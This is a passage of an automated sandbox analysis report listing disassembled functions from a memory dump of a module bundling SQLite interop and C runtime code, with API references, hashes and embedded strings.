                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f744999bb2c0d4923195223302d284b191c98e6ac0a2b0ddd576c3c6612d94bb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D5316FB6614A006FD314DE68D881E6BB3FDFBC8714F448A1DF999C7201E738EA0487A1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SIdac3904ec873f97d.SQLITE.INTEROP(?,?,?), ref: 6BC6F812
                                                                                                                                                                                                                                      • SIe1639e708407f10b.SQLITE.INTEROP(?), ref: 6BC6F831
                                                                                                                                                                                                                                      • SIdac3904ec873f97d.SQLITE.INTEROP(?,?,?), ref: 6BC6F84C
                                                                                                                                                                                                                                      • SIe1639e708407f10b.SQLITE.INTEROP(?), ref: 6BC6F86B
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BC6F89D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Idac3904ec873f97d.Ie1639e708407f10b.$Iaa0f8e0c251cfd1d.
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 78947605-0
                                                                                                                                                                                                                                      • Opcode ID: dd7939f2676a4527ffe76a8ca9c6459fd1703c64773a9616fb93c311fd4fda85
                                                                                                                                                                                                                                      • Instruction ID: 39bd62518998cd5f00ff7cf5d3b65bce415ff5403e2e5a9c974d9b31b6fc594f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dd7939f2676a4527ffe76a8ca9c6459fd1703c64773a9616fb93c311fd4fda85
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB21D0B69257016FD311CF749CC2E5B73A99F892A8B040568FD199B301FB79EA0583B2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI94ecb64e9dbb8338.SQLITE.INTEROP ref: 6BC47D6F
                                                                                                                                                                                                                                      • SIffb8076c269e2a85.SQLITE.INTEROP(?,?,?), ref: 6BC47DA7
                                                                                                                                                                                                                                      • SI8b0d9e6837e61abc.SQLITE.INTEROP(?,?), ref: 6BC47DB8
                                                                                                                                                                                                                                      • SI8b0d9e6837e61abc.SQLITE.INTEROP ref: 6BC47DE0
                                                                                                                                                                                                                                      • SIb50fc3839c421869.SQLITE.INTEROP(?,00000000), ref: 6BC47E17
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I8b0d9e6837e61abc.$I94ecb64e9dbb8338.Ib50fc3839c421869.Iffb8076c269e2a85.
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4133859212-0
                                                                                                                                                                                                                                      • Opcode ID: ac3c5215f4208f6104a98d6abd110732d9ab069455603b2c679aef555e318317
                                                                                                                                                                                                                                      • Instruction ID: 25ee8a2984ffb708b6c958ae7097aacb69ea96750c592b3d700a15c30326f52d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac3c5215f4208f6104a98d6abd110732d9ab069455603b2c679aef555e318317
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 942125B5915202AFC210EF74994396BB3A8EEC4604F004E6AE94187201FB3CDF2596E3
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _malloc.LIBCMT ref: 6BBDC550
                                                                                                                                                                                                                                        • Part of subcall function 6BBDC4AE: __FF_MSGBANNER.LIBCMT ref: 6BBDC4C7
                                                                                                                                                                                                                                        • Part of subcall function 6BBDC4AE: __NMSG_WRITE.LIBCMT ref: 6BBDC4CE
                                                                                                                                                                                                                                        • Part of subcall function 6BBDC4AE: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,6BBD610E,00000000,00000001,00000000,?,6BBDC12D,00000018,6BD115D0,0000000C,6BBDC1BD), ref: 6BBDC4F3
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 6BBDC563
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocHeap_free_malloc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2734353464-0
                                                                                                                                                                                                                                      • Opcode ID: 63e6ccc812382ec76531da87446c519778e8c8be87cf924524206c6b9f4f49ef
                                                                                                                                                                                                                                      • Instruction ID: d64a1e4d52ce9749f3b6512a74eae744095ba9ec41565ea3313de9507330f30b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 63e6ccc812382ec76531da87446c519778e8c8be87cf924524206c6b9f4f49ef
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD11C6328442D1EFDF111B78D806B4E3BA9FF927B9F21456AF8599A140DF3CCA418B94
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,00000000,6BC12098,3304C483,7DE85000,7DE85000,6BCB6C5C,6BCB6C5C,6BCB6C5C,?,6BCB6C5C,?,6BC8DA3D,00000007,000000FF,00000000), ref: 6BC11365
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?,00000000,6BC12098,3304C483,7DE85000,7DE85000,6BCB6C5C,6BCB6C5C,6BCB6C5C,?,6BCB6C5C,?,6BC8DA3D,00000007,000000FF,00000000), ref: 6BC1137A
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(6BCC0C53,00000000,6BC12098,3304C483,7DE85000,7DE85000,6BCB6C5C,6BCB6C5C,6BCB6C5C,?,6BCB6C5C,?,6BC8DA3D,00000007,000000FF,00000000), ref: 6BC113A5
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,00000000,6BC12098,3304C483,7DE85000,7DE85000,6BCB6C5C,6BCB6C5C,6BCB6C5C,?,6BCB6C5C,?,6BC8DA3D,00000007,000000FF,00000000), ref: 6BC113CA
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 6BC113D7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Iaa0f8e0c251cfd1d.$_memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1480580083-0
                                                                                                                                                                                                                                      • Opcode ID: b443d2a4fef563921f20c6643cab532286caab1738db2a45b4897acb314f08d3
                                                                                                                                                                                                                                      • Instruction ID: ff1b1510d0611e72ec32b80840754b791c1af47c9a5e88ffa763282d5a85fe5a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b443d2a4fef563921f20c6643cab532286caab1738db2a45b4897acb314f08d3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F101C4B1E2653197EB108F68AC01F5E73A86F10A58F4500A8F854BB644FB2DFB15D7D2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC0DC6C
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?,?), ref: 6BC0DC75
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?,?,?), ref: 6BC0DC7E
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?,?,?,?), ref: 6BC0DC92
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?,?,?,?,?), ref: 6BC0DCAD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Iaa0f8e0c251cfd1d.
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 372259789-0
                                                                                                                                                                                                                                      • Opcode ID: 740e3b5eca8cdd87589693048f43918f4b7f7e85a10aac31c018f6f71c38ba34
                                                                                                                                                                                                                                      • Instruction ID: 9f41d622d3f04dcad1e575a18d86d2753375f811f9055c89d0e0f35ade7d27b3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 740e3b5eca8cdd87589693048f43918f4b7f7e85a10aac31c018f6f71c38ba34
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 66F079B1921B149F83209FBA98C1857FBE8BF0825C3404A2EE48A87A11D735F9488BD0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 6BBD8940
                                                                                                                                                                                                                                        • Part of subcall function 6BBD641B: __getptd_noexit.LIBCMT ref: 6BBD641E
                                                                                                                                                                                                                                        • Part of subcall function 6BBD641B: __amsg_exit.LIBCMT ref: 6BBD642B
                                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 6BBD8957
                                                                                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 6BBD8965
                                                                                                                                                                                                                                      • __lock.LIBCMT ref: 6BBD8975
                                                                                                                                                                                                                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 6BBD8989
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 938513278-0
                                                                                                                                                                                                                                      • Opcode ID: 88a7231600206d02ffaa3a40da02d768de34181bcd5f858d51550618caa27e60
                                                                                                                                                                                                                                      • Instruction ID: 842d5f0cae014dec26734fa69a6d756b7d525a2b5d7ec9d475d070bb6db52d6b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 88a7231600206d02ffaa3a40da02d768de34181bcd5f858d51550618caa27e60
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DBF0B4329447909BE711AB759C0374D77A0AF0072EF516289D495AB2C0CF6C44429F5B
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memset$Iaa0f8e0c251cfd1d.
                                                                                                                                                                                                                                      • String ID: %s.xBestIndex malfunction
                                                                                                                                                                                                                                      • API String ID: 2593926388-3856629991
                                                                                                                                                                                                                                      • Opcode ID: 52f5aa8fff8cbd309b4cd9959d3a9fee5c333f2f80a39e015d40ea6e2989341c
                                                                                                                                                                                                                                      • Instruction ID: 4d65b85db4ea13a79ca1f50f5da355f9aa44fdbbaae5eed8f611022775590cba
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 52f5aa8fff8cbd309b4cd9959d3a9fee5c333f2f80a39e015d40ea6e2989341c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CCE1D470A107168FDB14CF68C481BAAB7F1FF49314F8042ADD85A87751E33AEA56CB90
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                                                                                      • String ID: %.*z:%u$column%d$rowid
                                                                                                                                                                                                                                      • API String ID: 2102423945-2903559916
                                                                                                                                                                                                                                      • Opcode ID: 12575551c0471b533f1fc025aa5bff1b294bd1aad5a4581b6e5f657ebc27427a
                                                                                                                                                                                                                                      • Instruction ID: d859225c133bb0e6dd1df41256e5b125d8815fa7360a443d85841a1c30ef3314
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 12575551c0471b533f1fc025aa5bff1b294bd1aad5a4581b6e5f657ebc27427a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9FD1E370E212069BEB05CF68C8817AFB7B4BF05718F1041A9D919DB241F739EB45CB91
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: domain error
                                                                                                                                                                                                                                      • API String ID: 0-1959930803
                                                                                                                                                                                                                                      • Opcode ID: 32ec4aa51d611c451ac6d6bb5c2a86518c0b988483395c15cad7a978d9e88828
                                                                                                                                                                                                                                      • Instruction ID: 5da0a75786a6fe6f3753d553d2605baeb1c7a9dccc7724c89eac5c25cfa902b1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 32ec4aa51d611c451ac6d6bb5c2a86518c0b988483395c15cad7a978d9e88828
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62713B71A196508BC700CE69D89164EB3E1FFC5328F344B99E8A897341FB39DB458792
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC7A956
                                                                                                                                                                                                                                      • database corruption, xrefs: 6BC7A951
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC7A947
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
                                                                                                                                                                                                                                      • API String ID: 0-2469029621
                                                                                                                                                                                                                                      • Opcode ID: 580347d381445364f5ed279d55a8f1f50f3c0fb5d32eddcfc8d374f2d88ca21f
                                                                                                                                                                                                                                      • Instruction ID: c53e0e155f3325d38bd7caa0c395dbae52f3572076c18fd19badcfb4dc70d4fc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 580347d381445364f5ed279d55a8f1f50f3c0fb5d32eddcfc8d374f2d88ca21f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B71D2716292018BDB24EF68C48165A77A1FBC4364F1046FAFC99CB381F339D946CBA1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • q, xrefs: 6BC8485F
                                                                                                                                                                                                                                      • %sON CONFLICT clause does not match any PRIMARY KEY or UNIQUE constraint, xrefs: 6BC849FF
                                                                                                                                                                                                                                      • %r , xrefs: 6BC849E5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                                                                                      • String ID: %r $%sON CONFLICT clause does not match any PRIMARY KEY or UNIQUE constraint$q
                                                                                                                                                                                                                                      • API String ID: 2102423945-3220699075
                                                                                                                                                                                                                                      • Opcode ID: 8d5608541ed28b68e8332a7f65f648173655a64737d0d68700d60b973b363583
                                                                                                                                                                                                                                      • Instruction ID: f1e8bcf5157fba6d4b7b08363d5c89f758401b056dbb7e2621410aafc70435d4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d5608541ed28b68e8332a7f65f648173655a64737d0d68700d60b973b363583
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F917071D152199FDB20CFA9D880AADBBB9FF49318F104199D858A7740F738AA51CFA0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: domain error
                                                                                                                                                                                                                                      • API String ID: 0-1959930803
                                                                                                                                                                                                                                      • Opcode ID: aa52fcd43646bc78c0205328420aa165da33ed4666b5d4ddd2d30e43ae7ebb99
                                                                                                                                                                                                                                      • Instruction ID: b085dcb1f9bbc22e6f163e76778762606a2da5aab534792b5cade7577422ba60
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aa52fcd43646bc78c0205328420aa165da33ed4666b5d4ddd2d30e43ae7ebb99
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 37513932A296104BD700CF68D85174B73E1AF85329F3847A9E9A88B381FB39DB4583D1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
